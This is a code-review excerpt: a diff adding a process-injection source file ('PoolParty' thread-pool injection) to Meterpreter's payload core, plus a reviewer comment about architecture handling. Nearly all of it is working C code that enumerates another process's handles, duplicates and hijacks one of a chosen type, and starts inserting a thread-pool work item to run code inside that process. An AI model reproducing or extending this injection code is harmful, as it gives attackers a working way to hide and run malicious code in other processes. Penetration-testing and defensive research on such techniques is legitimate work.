c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+	HANDLE hHijackHandle = INVALID_HANDLE_VALUE;
+	ULONG dwInformationSizeIn = 2048;
+	ULONG dwInformationSizeOut = 0;
+	HANDLE hCurrProcess = GetCurrentProcess();
+	HANDLE hHeap = GetProcessHeap();
+	PPROCESS_HANDLE_SNAPSHOT_INFORMATION lpProcessInfo = NULL;
+	PPUBLIC_OBJECT_TYPE_INFORMATION lpObjectInfo = NULL;
+	pNtDll* ntDll = GetOrInitNtDll();
+
+	DWORD ntStatus = 0;
+	lpProcessInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwInformationSizeIn);
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpProcessInfo: %p", lpProcessInfo);
+
+	while (TRUE) {
+		ntStatus = ntdll->pNtQueryInformationProcess(hProcess, ProcessHandleInformation, lpProcessInfo, dwInformationSizeIn, &dwInformationSizeOut);
+		dprintf("[INJECT][inject_via_poolparty][get_remote_handle] NtQueryInformationProcess() : %p", ntStatus);
+		if (ntStatus == 0xC0000004L && dwInformationSizeIn != dwInformationSizeOut) {
+			lpProcessInfo = HeapReAlloc(hHeap, 0, lpProcessInfo, dwInformationSizeOut);
+			dprintf("[INJECT][inject_via_poolparty][get_remote_handle] HeapReAlloc lpProcessInfo: %p", lpProcessInfo);
+			dwInformationSizeIn = dwInformationSizeOut;
+			continue;
+		}
+		if (ntStatus != 0 && ntStatus != 0xC0000004L) {
+			HeapFree(hHeap, 0, lpProcessInfo);
+			return INVALID_HANDLE_VALUE;
+		}
+		if (ntStatus == 0) {
+			break;
+		}
+	}
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpProcessInfo: %p dwInformationSizeIn: %d", lpProcessInfo, dwInformationSizeIn);
+	dwInformationSizeIn = 2048;
+	dwInformationSizeOut = 0;
+	lpObjectInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwInformationSizeIn);
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpObjectInfo: %p", lpObjectInfo);
+	for (ULONG i = 0; i < lpProcessInfo->NumberOfHandles; i++) {
+		if (DuplicateHandle(hProcess, lpProcessInfo->Handles[i].HandleValue, hCurrProcess, &hHijackHandle, dwDesiredAccess, FALSE, 0)) {
+			ntDll->pNtQueryObject(hHijackHandle, ObjectTypeInformation, lpObjectInfo, dwInformationSizeIn, &dwInformationSizeOut);
+			if (dwInformationSizeIn > dwInformationSizeOut) {
+				if (lstrcmpW(typeName, lpObjectInfo->TypeName.Buffer) == 0) {
+					break;
+				}
+			}
+			CloseHandle(hHijackHandle);
+		}
+		hHijackHandle = INVALID_HANDLE_VALUE;
+	}
+	HeapFree(hHeap, 0, lpObjectInfo);
+	HeapFree(hHeap, 0, lpProcessInfo);
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] hHijackHandle: %p", hHijackHandle);
+	return hHijackHandle;
+}
+
+DWORD remote_tp_direct_insertion(HANDLE hProcess, DWORD dwDestinationArch, LPVOID lpStartAddress, LPVOID lpParameter, HANDLE* hTriggerEvent) {
+	BOOL bError = FALSE;
+	HANDLE hHijackHandle = INVALID_HANDLE_VALUE;
+	ULONG dwInformationSizeIn = 1;
+	ULONG dwInformationSizeOut = 0;
+	pNtDll* ntDll = NULL;
+	DWORD dwResult = ERROR_POOLPARTY_GENERIC;
+	HANDLE hHeap = GetProcessHeap();
+	DWORD dwDirectSize = dwDestinationArch == PROCESS_ARCH_X64 ? TP_DIRECT_STRUCT_SIZE_X64 : TP_DIRECT_STRUCT_SIZE_X86;
```

Comment:
Same as above; we should probably quit assuming the arch is x86 if the ARCH is not x64.